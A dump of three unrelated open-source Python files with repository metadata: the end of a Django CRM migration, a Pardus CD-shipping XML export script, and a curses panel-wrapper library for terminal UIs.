('state', models.CharField(max_length=200, null=True, blank=True)),
('zipcode', models.CharField(max_length=200, null=True, blank=True)),
('country', models.CharField(max_length=200, null=True, blank=True)),
('phone', models.CharField(max_length=200, null=True, blank=True)),
],
options={
'verbose_name_plural': 'companies',
},
),
migrations.CreateModel(
name='Contact',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('first_name', models.CharField(max_length=200)),
('last_name', models.CharField(max_length=200)),
('address1', models.CharField(max_length=200, null=True, blank=True)),
('address2', models.CharField(max_length=200, null=True, blank=True)),
('city', models.CharField(max_length=200, null=True, blank=True)),
('state', models.CharField(max_length=200, null=True, blank=True)),
('zipcode', models.CharField(max_length=200, null=True, blank=True)),
('country', models.CharField(max_length=200, null=True, blank=True)),
('phone', models.CharField(max_length=200, null=True, blank=True)),
('email', models.EmailField(max_length=200, null=True, blank=True)),
('company', models.ForeignKey(blank=True, to='crm.Company', null=True)),
],
),
migrations.CreateModel(
name='Opportunity',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('value', models.FloatField(help_text=b'How much this opportunity is worth to the organization')),
('create_date', models.DateTimeField(auto_now_add=True)),
('company', models.ForeignKey(blank=True, to='crm.Company', null=True)),
('contact', models.ForeignKey(to='crm.Contact')),
('source', models.ForeignKey(help_text=b'How did this contact find out about us?', to='crm.Campaign')),
],
options={
'verbose_name_plural': 'opportunities',
},
),
migrations.CreateModel(
name='OpportunityStage',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('timestamp', models.DateTimeField(auto_now_add=True)),
('opportunity', models.ForeignKey(to='crm.Opportunity')),
],
),
migrations.CreateModel(
name='Reminder',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date', models.DateField()),
('note', models.CharField(max_length=200)),
('completed', models.BooleanField(default=False)),
('opportunity', models.ForeignKey(to='crm.Opportunity')),
],
),
migrations.CreateModel(
name='Report',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=200)),
('link', models.URLField()),
],
),
migrations.CreateModel(
name='Stage',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=200)),
('order', models.IntegerField(help_text=b'The order this is displayed on the screen')),
('description', models.TextField(null=True, blank=True)),
('value', models.IntegerField(help_text=b'On a scale of 0 to 100 of the stage of the pipeline')),
],
),
migrations.AddField(
model_name='opportunitystage',
name='stage',
field=models.ForeignKey(to='crm.Stage'),
),
migrations.AddField(
model_name='opportunitystage',
name='user',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='opportunity',
name='stage',
field=models.ForeignKey(to='crm.Stage'),
),
migrations.AddField(
model_name='opportunity',
name='user',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='calllog',
name='opportunity',
field=models.ForeignKey(to='crm.Opportunity'),
),
migrations.AddField(
model_name='calllog',
name='user',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
]
|
i2c2-caj/CS4990
|
Homework/crminal/crm/migrations/0001_initial.py
|
Python
|
gpl-2.0
| 6,674 | 0.004495 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import locale
import os
import sys
from datetime import date
from kargoxml import add_column
script_dir = os.path.split(os.path.abspath(os.path.dirname(__file__)))[0]
project_dir = os.path.split(script_dir)[0]
sys.path.append(project_dir)
sys.path.append(os.path.split(project_dir)[0])
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from oi.shipit.models import CdClient
from oi.shipit.models import PardusVersion
from django.template.defaultfilters import slugify
if __name__ == '__main__':
args = sys.argv
pardus_versions = PardusVersion.objects.all()
if len(args) != 2:
print("Usage: python %s [limit]") % __file__
sys.exit()
try:
limit = int(args[-1])
except ValueError:
print("Invalid limit: %s") % args[-1]
sys.exit()
#locale.setlocale(locale.LC_ALL, "tr_TR.UTF-8")
for version in pardus_versions:
cdclient = CdClient.objects.filter(confirmed=1,
sent=0, taken=0, version=version).order_by('date')[:limit]
add_column(cdclient, date.today().isoformat(), slugify(version))
|
MehmetNuri/ozgurlukicin
|
scripts/kargo/main.py
|
Python
|
gpl-3.0
| 1,129 | 0.004429 |
"""
Wrapper for safely working with curses subwindows.
Based on code from the arm project, developed by Damian Johnson under GPLv3
(www.atagar.com - atagar@torproject.org)
"""
import os
import copy
import time
import curses
import curses.ascii
import curses.textpad
from threading import RLock
from multiprocessing import Queue
from input import *
from tools import *
# global ui lock governing all panel instances (curses isn't thread save and
# concurrency bugs produce especially sinister glitches)
CURSES_LOCK = RLock()
# tags used by addfstr - this maps to functor/argument combinations since the
# actual values (in the case of color attributes) might not yet be initialized
def _noOp(arg): return arg
FORMAT_TAGS = {"<b>": (_noOp, curses.A_BOLD),
"<u>": (_noOp, curses.A_UNDERLINE),
"<h>": (_noOp, curses.A_STANDOUT)}
for colorLabel in COLOR_LIST: FORMAT_TAGS["<%s>" % colorLabel] = (getColor, colorLabel)
# prevents curses redraws if set
HALT_ACTIVITY = False
OptionResult = Enum("BACK", "NEXT")
class Panel():
"""
Wrapper for curses subwindows. This hides most of the ugliness in common
curses operations including:
- locking when concurrently drawing to multiple windows
- gracefully handle terminal resizing
- clip text that falls outside the panel
- convenience methods for word wrap, in-line formatting, etc
This uses a design akin to Swing where panel instances provide their display
implementation by overwriting the draw() method, and are redrawn with
redraw().
"""
def __init__(self, parent, name, top, left=0, height= -1, width= -1):
"""
Creates a durable wrapper for a curses subwindow in the given parent.
Arguments:
parent - parent curses window
name - identifier for the panel
top - positioning of top within parent
left - positioning of the left edge within the parent
height - maximum height of panel (uses all available space if -1)
width - maximum width of panel (uses all available space if -1)
"""
# The not-so-pythonic getters for these parameters are because some
# implementations aren't entirely deterministic (for instance panels
# might chose their height based on its parent's current width).
self.panelName = name
self.parent = parent
self.visible = False
self.titleVisible = True
# Attributes for pausing. The pauseAttr contains variables our getAttr
# method is tracking, and the pause buffer has copies of the values from
# when we were last unpaused (unused unless we're paused).
self.paused = False
self.pauseAttr = []
self.pauseBuffer = {}
self.pauseTime = -1
self.top = top
self.left = left
self.height = height
self.width = width
# The panel's subwindow instance. This is made available to implementors
# via their draw method and shouldn't be accessed directly.
#
# This is None if either the subwindow failed to be created or needs to be
# remade before it's used. The later could be for a couple reasons:
# - The subwindow was never initialized.
# - Any of the parameters used for subwindow initialization have changed.
self.win = None
self.maxY, self.maxX = -1, -1 # subwindow dimensions when last redrawn
def getName(self):
"""
Provides panel's identifier.
"""
return self.panelName
def isTitleVisible(self):
"""
True if the title is configured to be visible, False otherwise.
"""
return self.titleVisible
def setTitleVisible(self, isVisible):
"""
Configures the panel's title to be visible or not when it's next redrawn.
This is not guarenteed to be respected (not all panels have a title).
"""
self.titleVisible = isVisible
def getParent(self):
"""
Provides the parent used to create subwindows.
"""
return self.parent
def setParent(self, parent):
"""
Changes the parent used to create subwindows.
Arguments:
parent - parent curses window
"""
if self.parent != parent:
self.parent = parent
self.win = None
def isVisible(self):
"""
Provides if the panel's configured to be visible or not.
"""
return self.visible
def setVisible(self, isVisible):
"""
Toggles if the panel is visible or not.
Arguments:
isVisible - panel is redrawn when requested if true, skipped otherwise
"""
self.visible = isVisible
def isPaused(self):
"""
Provides if the panel's configured to be paused or not.
"""
return self.paused
def setPauseAttr(self, attr):
"""
Configures the panel to track the given attribute so that getAttr provides
the value when it was last unpaused (or its current value if we're
currently unpaused). For instance...
> self.setPauseAttr("myVar")
> self.myVar = 5
> self.myVar = 6 # self.getAttr("myVar") -> 6
> self.setPaused(True)
> self.myVar = 7 # self.getAttr("myVar") -> 6
> self.setPaused(False)
> self.myVar = 7 # self.getAttr("myVar") -> 7
Arguments:
attr - parameter to be tracked for getAttr
"""
self.pauseAttr.append(attr)
self.pauseBuffer[attr] = self.copyAttr(attr)
def getAttr(self, attr):
"""
Provides the value of the given attribute when we were last unpaused. If
we're currently unpaused then this is the current value. If untracked this
returns None.
Arguments:
attr - local variable to be returned
"""
if not attr in self.pauseAttr: return None
elif self.paused: return self.pauseBuffer[attr]
else: return self.__dict__.get(attr)
def copyAttr(self, attr):
"""
Provides a duplicate of the given configuration value, suitable for the
pause buffer.
Arguments:
attr - parameter to be provided back
"""
currentValue = self.__dict__.get(attr)
return copy.copy(currentValue)
def setPaused(self, isPause, suppressRedraw=False):
"""
Toggles if the panel is paused or not. This causes the panel to be redrawn
when toggling is pause state unless told to do otherwise. This is
important when pausing since otherwise the panel's display could change
when redrawn for other reasons.
This returns True if the panel's pause state was changed, False otherwise.
Arguments:
isPause - freezes the state of the pause attributes if true, makes
them editable otherwise
suppressRedraw - if true then this will never redraw the panel
"""
if isPause != self.paused:
if isPause: self.pauseTime = time.time()
self.paused = isPause
if isPause:
# copies tracked attributes so we know what they were before pausing
for attr in self.pauseAttr:
self.pauseBuffer[attr] = self.copyAttr(attr)
if not suppressRedraw: self.redraw(True)
return True
else: return False
def getPauseTime(self):
"""
Provides the time that we were last paused, returning -1 if we've never
been paused.
"""
return self.pauseTime
def getTop(self):
"""
Provides the position subwindows are placed at within its parent.
"""
return self.top
def setTop(self, top):
"""
Changes the position where subwindows are placed within its parent.
Arguments:
top - positioning of top within parent
"""
if self.top != top:
self.top = top
self.win = None
def getLeft(self):
"""
Provides the left position where this subwindow is placed within its
parent.
"""
return self.left
def setLeft(self, left):
"""
Changes the left position where this subwindow is placed within its parent.
Arguments:
left - positioning of top within parent
"""
if self.left != left:
self.left = left
self.win = None
def getHeight(self):
"""
Provides the height used for subwindows (-1 if it isn't limited).
"""
return self.height
def setHeight(self, height):
"""
Changes the height used for subwindows. This uses all available space if -1.
Arguments:
height - maximum height of panel (uses all available space if -1)
"""
if self.height != height:
self.height = height
self.win = None
def getWidth(self):
"""
Provides the width used for subwindows (-1 if it isn't limited).
"""
return self.width
def setWidth(self, width):
"""
Changes the width used for subwindows. This uses all available space if -1.
Arguments:
width - maximum width of panel (uses all available space if -1)
"""
if self.width != width:
self.width = width
self.win = None
def getPreferredSize(self):
"""
Provides the dimensions the subwindow would use when next redrawn, given
that none of the properties of the panel or parent change before then. This
returns a tuple of (height, width).
"""
newHeight, newWidth = self.parent.getmaxyx()
setHeight, setWidth = self.getHeight(), self.getWidth()
newHeight = max(0, newHeight - self.top)
newWidth = max(0, newWidth - self.left)
if setHeight != -1: newHeight = min(newHeight, setHeight)
if setWidth != -1: newWidth = min(newWidth, setWidth)
return (newHeight, newWidth)
def handleKey(self, key):
"""
Handler for user input. This returns true if the key press was consumed,
false otherwise.
Arguments:
key - keycode for the key pressed
"""
return False
def getHelp(self):
"""
Provides help information for the controls this page provides. This is a
list of tuples of the form...
(control, description, status)
"""
return []
def draw(self, width, height):
"""
Draws display's content. This is meant to be overwritten by
implementations and not called directly (use redraw() instead). The
dimensions provided are the drawable dimensions, which in terms of width is
a column less than the actual space.
Arguments:
width - horizontal space available for content
height - vertical space available for content
"""
pass
def redraw(self, forceRedraw=False, block=False):
"""
Clears display and redraws its content. This can skip redrawing content if
able (ie, the subwindow's unchanged), instead just refreshing the display.
Arguments:
forceRedraw - forces the content to be cleared and redrawn if true
block - if drawing concurrently with other panels this determines
if the request is willing to wait its turn or should be
abandoned
"""
# skipped if not currently visible or activity has been halted
if not self.isVisible() or HALT_ACTIVITY: return
# if the panel's completely outside its parent then this is a no-op
newHeight, newWidth = self.getPreferredSize()
if newHeight == 0 or newWidth == 0:
self.win = None
return
# recreates the subwindow if necessary
isNewWindow = self._resetSubwindow()
# The reset argument is disregarded in a couple of situations:
# - The subwindow's been recreated (obviously it then doesn't have the old
# content to refresh).
# - The subwindow's dimensions have changed since last drawn (this will
# likely change the content's layout)
subwinMaxY, subwinMaxX = self.win.getmaxyx()
if isNewWindow or subwinMaxY != self.maxY or subwinMaxX != self.maxX:
forceRedraw = True
self.maxY, self.maxX = subwinMaxY, subwinMaxX
if not CURSES_LOCK.acquire(block): return
try:
if forceRedraw:
self.win.erase() # clears any old contents
self.draw(self.maxX, self.maxY)
self.win.refresh()
finally:
CURSES_LOCK.release()
def hline(self, y, x, length, attr=curses.A_NORMAL):
"""
Draws a horizontal line. This should only be called from the context of a
panel's draw method.
Arguments:
y - vertical location
x - horizontal location
length - length the line spans
attr - text attributes
"""
if self.win and self.maxX > x and self.maxY > y:
try:
drawLength = min(length, self.maxX - x)
self.win.hline(y, x, curses.ACS_HLINE | attr, drawLength)
except:
# in edge cases drawing could cause a _curses.error
pass
def vline(self, y, x, length, attr=curses.A_NORMAL):
"""
Draws a vertical line. This should only be called from the context of a
panel's draw method.
Arguments:
y - vertical location
x - horizontal location
length - length the line spans
attr - text attributes
"""
if self.win and self.maxX > x and self.maxY > y:
try:
drawLength = min(length, self.maxY - y)
self.win.vline(y, x, curses.ACS_VLINE | attr, drawLength)
except:
# in edge cases drawing could cause a _curses.error
pass
def addch(self, y, x, char, attr=curses.A_NORMAL):
"""
Draws a single character. This should only be called from the context of a
panel's draw method.
Arguments:
y - vertical location
x - horizontal location
char - character to be drawn
attr - text attributes
"""
if self.win and self.maxX > x and self.maxY > y:
try:
self.win.addch(y, x, char, attr)
except:
# in edge cases drawing could cause a _curses.error
pass
def addstr(self, y, x, msg, attr=curses.A_NORMAL):
"""
Writes string to subwindow if able. This takes into account screen bounds
to avoid making curses upset. This should only be called from the context
of a panel's draw method.
Arguments:
y - vertical location
x - horizontal location
msg - text to be added
attr - text attributes
"""
# subwindows need a single character buffer (either in the x or y
# direction) from actual content to prevent crash when shrank
if self.win and self.maxX > x and self.maxY > y:
try:
self.win.addstr(y, x, msg[:self.maxX - x], attr)
except:
# this might produce a _curses.error during edge cases, for instance
# when resizing with visible popups
pass
def addfstr(self, y, x, msg):
"""
Writes string to subwindow. The message can contain xhtml-style tags for
formatting, including:
<b>text</b> bold
<u>text</u> underline
<h>text</h> highlight
<[color]>text</[color]> use color (see getColor() for constants)
Tag nesting is supported and tag closing is strictly enforced (raising an
exception for invalid formatting). Unrecognized tags are treated as normal
text. This should only be called from the context of a panel's draw method.
Text in multiple color tags (for instance "<blue><red>hello</red></blue>")
uses the bitwise OR of those flags (hint: that's probably not what you
want).
Arguments:
y - vertical location
x - horizontal location
msg - formatted text to be added
"""
if self.win and self.maxY > y:
formatting = [curses.A_NORMAL]
expectedCloseTags = []
unusedMsg = msg
while self.maxX > x and len(unusedMsg) > 0:
# finds next consumeable tag (left as None if there aren't any left)
nextTag, tagStart, tagEnd = None, -1, -1
tmpChecked = 0 # portion of the message cleared for having any valid tags
expectedTags = FORMAT_TAGS.keys() + expectedCloseTags
while nextTag == None:
tagStart = unusedMsg.find("<", tmpChecked)
tagEnd = unusedMsg.find(">", tagStart) + 1 if tagStart != -1 else -1
if tagStart == -1 or tagEnd == -1: break # no more tags to consume
else:
# check if the tag we've found matches anything being expected
if unusedMsg[tagStart:tagEnd] in expectedTags:
nextTag = unusedMsg[tagStart:tagEnd]
break # found a tag to use
else:
# not a valid tag - narrow search to everything after it
tmpChecked = tagEnd
# splits into text before and after tag
if nextTag:
msgSegment = unusedMsg[:tagStart]
unusedMsg = unusedMsg[tagEnd:]
else:
msgSegment = unusedMsg
unusedMsg = ""
# adds text before tag with current formatting
attr = 0
for format in formatting: attr |= format
self.win.addstr(y, x, msgSegment[:self.maxX - x - 1], attr)
x += len(msgSegment)
# applies tag attributes for future text
if nextTag:
formatTag = "<" + nextTag[2:] if nextTag.startswith("</") else nextTag
formatMatch = FORMAT_TAGS[formatTag][0](FORMAT_TAGS[formatTag][1])
if not nextTag.startswith("</"):
# open tag - add formatting
expectedCloseTags.append("</" + nextTag[1:])
formatting.append(formatMatch)
else:
# close tag - remove formatting
expectedCloseTags.remove(nextTag)
formatting.remove(formatMatch)
# only check for unclosed tags if we processed the whole message (if we
# stopped processing prematurely it might still be valid)
if expectedCloseTags and not unusedMsg:
# if we're done then raise an exception for any unclosed tags (tisk, tisk)
baseMsg = "Unclosed formatting tag%s:" % ("s" if len(expectedCloseTags) > 1 else "")
raise ValueError("%s: '%s'\n \"%s\"" % (baseMsg, "', '".join(expectedCloseTags), msg))
def getstr(self, y, x, initialText="", format=None, maxWidth=None, validator=None):
"""
Provides a text field where the user can input a string, blocking until
they've done so and returning the result. If the user presses escape then
this terminates and provides back None. This should only be called from
the context of a panel's draw method.
This blanks any content within the space that the input field is rendered
(otherwise stray characters would be interpreted as part of the initial
input).
Arguments:
y - vertical location
x - horizontal location
initialText - starting text in this field
format - format used for the text
maxWidth - maximum width for the text field
validator - custom TextInputValidator for handling keybindings
"""
if not format: format = curses.A_NORMAL
# makes cursor visible
try: previousCursorState = curses.curs_set(1)
except curses.error: previousCursorState = 0
# temporary subwindow for user input
displayWidth = self.getPreferredSize()[1]
if maxWidth: displayWidth = min(displayWidth, maxWidth + x)
inputSubwindow = self.parent.subwin(1, displayWidth - x, self.top + y, self.left + x)
# blanks the field's area, filling it with the font in case it's hilighting
inputSubwindow.clear()
inputSubwindow.bkgd(' ', format)
# prepopulates the initial text
if initialText:
inputSubwindow.addstr(0, 0, initialText[:displayWidth - x - 1], format)
# Displays the text field, blocking until the user's done. This closes the
# text panel and returns userInput to the initial text if the user presses
# escape.
textbox = curses.textpad.Textbox(inputSubwindow)
if not validator:
validator = BasicValidator()
textbox.win.attron(format)
userInput = textbox.edit(lambda key: validator.validate(key, textbox)).strip()
textbox.win.attroff(format)
if textbox.lastcmd == curses.ascii.BEL: userInput = None
# reverts visability settings
try: curses.curs_set(previousCursorState)
except curses.error: pass
return userInput
def addScrollBar(self, top, bottom, size, drawTop=0, drawBottom= -1, drawLeft=0, drawScrollBox=True):
"""
Draws a left justified scroll bar reflecting position within a vertical
listing. This is shorted if necessary, and left undrawn if no space is
available. The bottom is squared off, having a layout like:
|
*|
*|
*|
|
-+
This should only be called from the context of a panel's draw method.
Arguments:
top - list index for the top-most visible element
bottom - list index for the bottom-most visible element
size - size of the list in which the listed elements are contained
drawTop - starting row where the scroll bar should be drawn
drawBottom - ending row where the scroll bar should end, -1 if it should
span to the bottom of the panel
drawLeft - left offset at which to draw the scroll bar
"""
if (self.maxY - drawTop) < 2: return # not enough room
# sets drawBottom to be the actual row on which the scrollbar should end
if drawBottom == -1: drawBottom = self.maxY - 1
else: drawBottom = min(drawBottom, self.maxY - 1)
# determines scrollbar dimensions
scrollbarHeight = drawBottom - drawTop
sliderTop = scrollbarHeight * top / size
sliderSize = scrollbarHeight * (bottom - top) / size
# ensures slider isn't at top or bottom unless really at those extreme bounds
if top > 0: sliderTop = max(sliderTop, 1)
if bottom != size: sliderTop = min(sliderTop, scrollbarHeight - sliderSize - 2)
# avoids a rounding error that causes the scrollbar to be too low when at
# the bottom
if bottom == size: sliderTop = scrollbarHeight - sliderSize - 1
# draws scrollbar slider
for i in range(scrollbarHeight):
if i >= sliderTop and i <= sliderTop + sliderSize:
self.addstr(i + drawTop, drawLeft, " ", curses.A_STANDOUT)
else:
self.addstr(i + drawTop, drawLeft, " ")
# draws box around the scroll bar
if drawScrollBox:
self.vline(drawTop, drawLeft + 1, drawBottom - 1)
self.addch(drawBottom, drawLeft + 1, curses.ACS_LRCORNER)
self.addch(drawBottom, drawLeft, curses.ACS_HLINE)
def _resetSubwindow(self):
"""
Create a new subwindow instance for the panel if:
- Panel currently doesn't have a subwindow (was uninitialized or
invalidated).
- There's room for the panel to grow vertically (curses automatically
lets subwindows regrow horizontally, but not vertically).
- The subwindow has been displaced. This is a curses display bug that
manifests if the terminal's shrank then re-expanded. Displaced
subwindows are never restored to their proper position, resulting in
graphical glitches if we draw to them.
- The preferred size is smaller than the actual size (should shrink).
This returns True if a new subwindow instance was created, False otherwise.
"""
newHeight, newWidth = self.getPreferredSize()
if newHeight == 0: return False # subwindow would be outside its parent
# determines if a new subwindow should be recreated
recreate = self.win == None
if self.win:
subwinMaxY, subwinMaxX = self.win.getmaxyx()
recreate |= subwinMaxY < newHeight # check for vertical growth
recreate |= self.top > self.win.getparyx()[0] # check for displacement
recreate |= subwinMaxX > newWidth or subwinMaxY > newHeight # shrinking
# I'm not sure if recreating subwindows is some sort of memory leak but the
# Python curses bindings seem to lack all of the following:
# - subwindow deletion (to tell curses to free the memory)
# - subwindow moving/resizing (to restore the displaced windows)
# so this is the only option (besides removing subwindows entirely which
# would mean far more complicated code and no more selective refreshing)
if recreate:
self.win = self.parent.subwin(newHeight, newWidth, self.top, self.left)
# note: doing this log before setting win produces an infinite loop
#msg = "recreating panel '%s' with the dimensions of %i/%i" % (self.getName(), newHeight, newWidth)
#log.debug(CONFIG["log.panelRecreated"], msg)
return recreate
class LabelPanel(Panel):
"""
Panel that just displays a single line of text.
"""
def __init__(self, stdscr):
Panel.__init__(self, stdscr, "msg", 0, height=1)
self.msgText = ""
self.msgAttr = curses.A_NORMAL
def setMessage(self, msg, attr=None):
"""
Sets the message being displayed by the panel.
Arguments:
msg - string to be displayed
attr - attribute for the label, normal text if undefined
"""
if attr == None: attr = curses.A_NORMAL
self.msgText = msg
self.msgAttr = attr
def draw(self, width, height):
self.addstr(0, 0, self.msgText, self.msgAttr)
class PopupPanel(Panel):
"""
Panel that just displays a single line of text.
"""
def __init__(self, stdscr, width, height):
Panel.__init__(self, stdscr, "popup", width, height)
self.queryText = None
self.queryAttr = curses.A_BOLD
self.defaultResponse = None
self.topUserResponse = 0
self.leftUserResponse = 0
self.userResponseMaxWidth = 0
def setQuery(self, query, attr=None):
"""
Sets the message being displayed by the panel.
Arguments:
msg - string to be displayed
attr - attribute for the label, normal text if undefined
"""
if attr == None: attr = curses.A_BOLD
self.queryText = query
self.queryAttr = attr
def setDefaultResponse(self, response):
self.defaultResponse = response
def getUserResponse(self):
userInput = None
if self.defaultResponse is not None:
CURSES_LOCK.acquire()
try:
userInput = self.getstr(self.topUserResponse, self.leftUserResponse, self.defaultResponse,
format=curses.A_STANDOUT, maxWidth=self.userResponseMaxWidth)
finally:
CURSES_LOCK.release()
return userInput
def draw(self, width, height):
drawBox(self, 0, 0, width - 2, height - 2)
yoffset = 2
if self.queryText is not None:
m = splitStr(self.queryText, width - 4)
for line in m:
self.addstr(yoffset, 2, line, self.queryAttr)
yoffset += 1
self.topUserResponse = yoffset + 2
self.leftUserResponse = 2
self.userResponseMaxWidth = width - 6
class ScrollPanel(Panel):
def __init__(self, stdscr, top):
Panel.__init__(self, stdscr, "scroll", top)
self.contents = None
self.scrollTop = 0
self.scrollBottom = 0
self.scrollHeight = 0
self.scrollFollow = True
def add(self, output):
for line in output.split('\n'): self.data.append(line)
if self.backlog > 0:
while len(self.data) > self.backlog: self.data.pop(0)
if self.scrollFollow:
self.scrollBottom = len(self.data)
self.scrollTop = max(0, self.scrollBottom - self.scrollHeight)
def set(self, contents):
self.contents = contents
def get(self):
return self.contents
def draw(self, width, height):
output = []
for item in self.contents:
lines = splitStr(item, width - 2)
for line in lines: output.append(line)
self.scrollLines = len(output)
self.scrollHeight = height - 1
self.scrollBottom = min(self.scrollTop + self.scrollHeight, self.scrollLines)
# if we've navigated away from the bottom of the log, stop following new output
if self.scrollBottom != self.scrollLines: self.scrollFollow = False
# start following again if we navigate back to the bottom of the log
else: self.scrollFollow = True
# dont draw unless we have data
if self.scrollLines > 0:
yoffset = 0
if self.isTitleVisible():
self.addstr(yoffset, 0, self.getName(), curses.A_STANDOUT)
self.addstr(yoffset, len(self.getName()) + 1, "s: save log", curses.A_NORMAL)
yoffset += 1
self.addScrollBar(self.scrollTop, self.scrollBottom, self.scrollLines, drawTop=yoffset, drawScrollBox=True)
for i in xrange(self.scrollTop, min(self.scrollBottom, len(output))):
line = output[i]
self.addstr(yoffset, 3, padStr(line, width - 3))
yoffset += 1
def handleKey(self, key):
# we only care if they pushed one of the scroll keys
if isScrollKey(key):
newScroll = getScrollPosition(key, self.scrollTop, self.scrollHeight, self.scrollLines)
if self.scrollTop != newScroll:
self.scrollTop = newScroll
self.redraw(True)
return True
else: return False
class ControlPanel(Panel):
"""
Panel that displays selectable controls.
"""
def __init__(self, stdscr, top, left):
Panel.__init__(self, stdscr, "Controls", top, left)
# holds a list of Options to display in this panel
self.controls = None
# display attributes for each option name
self.controlNameAttributes = curses.A_BOLD | curses.COLOR_RED
# display attributes for each option description
self.controlDescriptionAttributes = curses.COLOR_RED
# a message displayed before the option list
self.message = None
# display attributes for the message
self.messageAttributes = self.controlNameAttributes
# the option that is selected
self.selectedIndex = None
def setMessage(self, message):
self.message = message
def setControls(self, controls):
"""
Sets the controls being displayed by the panel.
Arguments:
controls - list of controls
"""
self.controls = controls
if controls is not None and len(self.controls) > 0: self.selectedIndex = 0
def draw(self, width, height):
drawBox(self, 0, 0, width, height)
# breakup the message and draw it inside the box
textWidth = width - 4
msgLines = splitStr(self.message, textWidth)
for i in range(len(msgLines)): self.addstr(i + 1, 2, msgLines[i], self.messageAttributes)
# track position for each option on the screen
y, offset = len(msgLines) + 1, 0
for o in self.controls:
# selected controls stand out from the rest
extraAttributes = 0
if o is self.controls[self.selectedIndex]: extraAttributes = curses.A_STANDOUT
# draw the option name and description
offset += 1
label = o[0]#.getName()
self.addstr(y + offset, 2, label,
self.controlNameAttributes | extraAttributes)
# set whitespace as non-bold due to curses pixel alignment bug
self.addstr(y + offset, 2 + len(label), " " * (textWidth - len(label)),
self.controlDescriptionAttributes | extraAttributes)
y += 1
description = splitStr(o[1], textWidth)#.getDescription(), 54)
for line in description:
self.addstr(y + offset, 2, padStr(line, textWidth),
self.controlDescriptionAttributes | extraAttributes)
offset += 1
def handleKey(self, key):
# if the iopanel is currently active, pass key there
if self.selectedIndex is not None:
if isScrollKey(key):
pageHeight = self.getPreferredSize()[0] - 1
self.selectedIndex = getScrollPosition(key, self.selectedIndex,
pageHeight, len(self.controls), isCursor=True, doLoop=True)
elif isSelectionKey(key):
return self.controls[self.selectedIndex][0]
return None
class OptionPanel(Panel):
"""
Panel that displays user options.
Each option may have list of suboptions. We currently only draw one level
of suboptions (meaning the suboptions of suboptions will not be drawn).
"""
def __init__(self, stdscr, top, left, message=None, options=[], rightAlignValues=False):
Panel.__init__(self, stdscr, "options", top, left)
# holds a list of Options to display in this panel
self.options = self._combineOptions(options, True)
# flat list of all options and recursive suboptions
self.displayedOptions = self._combineOptions(options, False)
# a message displayed before the option list
self.message = message
self.rightAlignValues = rightAlignValues
# the option that is selected
self.selectedIndex = 0 if len(options) > 0 else None
self.lastIndent = 0
self.lastValueWidth = 20
def _combineOptions(self, options, includeDisabled=True):
combined = []
for option in options:
if option.isEnabled() or includeDisabled:
combined.append(option)
sub = self._combineOptions(option.getSuboptions(), includeDisabled)
for s in sub: combined.append(s)
return combined
def setMessage(self, message):
self.message = message
def getOptions(self):
return self.options
def addOption(self, option):
"""
Sets the options being displayed by the panel.
Arguments:
options - list of options
"""
self.options.append(option)
for o in self._combineOptions([option], False): self.displayedOptions.append(o)
if self.selectedIndex is None: self.selectedIndex = 0
def draw(self, width, height):
defaultStyle = curses.A_BOLD
drawBox(self, 0, 0, width, height)
# breakup the message and draw it inside the box
textWidth = width - 4
msgLines = splitStr(self.message, textWidth)
for i in range(len(msgLines)): self.addstr(i + 1, 2, msgLines[i], defaultStyle)
# track position for each option on the screen
y = len(msgLines) + 2
selectedDescription = None
indent = 0
for o in self.options: indent = max(indent, len(o.getLabel()))
indent += 5 # 2 for left box and space, 3 for suboptions, 1 for pad
for o in self.displayedOptions:
# TODO fix this horrible inefficiency
isSubOption = False
for opt in self.displayedOptions:
if o in opt.getSuboptions():
isSubOption = True
break
# selected controls stand out from the rest
extraAttributes = 0
if self.selectedIndex < len(self.displayedOptions) and o is self.displayedOptions[self.selectedIndex]:
extraAttributes = curses.A_STANDOUT | curses.A_BOLD
selectedDescription = o.getDescription(width-4)
# draw the option name and description
label = o.getLabel()
labelLen = len(label)
x = 2
if isSubOption:
self.addch(y, x, curses.ACS_LLCORNER)
self.addch(y, x+1, curses.ACS_HLINE)
x += 3
labelLen += 1
self.addstr(y, x, label, o.getDisplayAttr() | extraAttributes)
remainingSpace = textWidth - labelLen
value = o.getDisplayValue()
if self.rightAlignValues:
self.addstr(y, width-2-len(value), value, o.getDisplayAttr() | extraAttributes)
remainingSpace -= len(value)
# set whitespace as non-bold due to curses pixel alignment bug
self.addstr(y, 2 + labelLen, " " * (remainingSpace),
o.getDisplayAttr() | extraAttributes)
else:
self.addstr(y, indent, value, o.getDisplayAttr() | extraAttributes)
# set whitespace as non-bold due to curses pixel alignment bug
endOfLabel = 2 + labelLen if not isSubOption else 4 + labelLen
self.addstr(y, endOfLabel, " " * (indent - (endOfLabel)),
o.getDisplayAttr() | extraAttributes)
self.addstr(y, indent + len(value), " " * (width-indent-2-len(value)),
o.getDisplayAttr() | extraAttributes)
y += 1
y += 1
prevLabel = "Back"
prevDesc = "Return to re-select the setup mode."
nextLabel = "Confirm config and start setup"
nextDesc = "Confirm the above configuration and start the setup process."
# TODO refactor this !!
if self.selectedIndex == len(self.displayedOptions):
self.addstr(y, 4, prevLabel, defaultStyle | curses.A_STANDOUT)
self.addstr(y, width-4-len(nextLabel), nextLabel, defaultStyle)
selectedDescription = splitStr(prevDesc, width-4)
elif self.selectedIndex == len(self.displayedOptions)+1:
self.addstr(y, 4, prevLabel, defaultStyle)
self.addstr(y, width-4-len(nextLabel), nextLabel, defaultStyle | curses.A_STANDOUT)
selectedDescription = splitStr(nextDesc, width-4)
else:
self.addstr(y, 4, prevLabel, defaultStyle)
self.addstr(y, width-4-len(nextLabel), nextLabel, defaultStyle)
y += 1
self.hline(y, 1, width-2)
y += 1
for line in selectedDescription:
self.addstr(y, 2, padStr(line, textWidth))
y += 1
self.lastIndent = indent
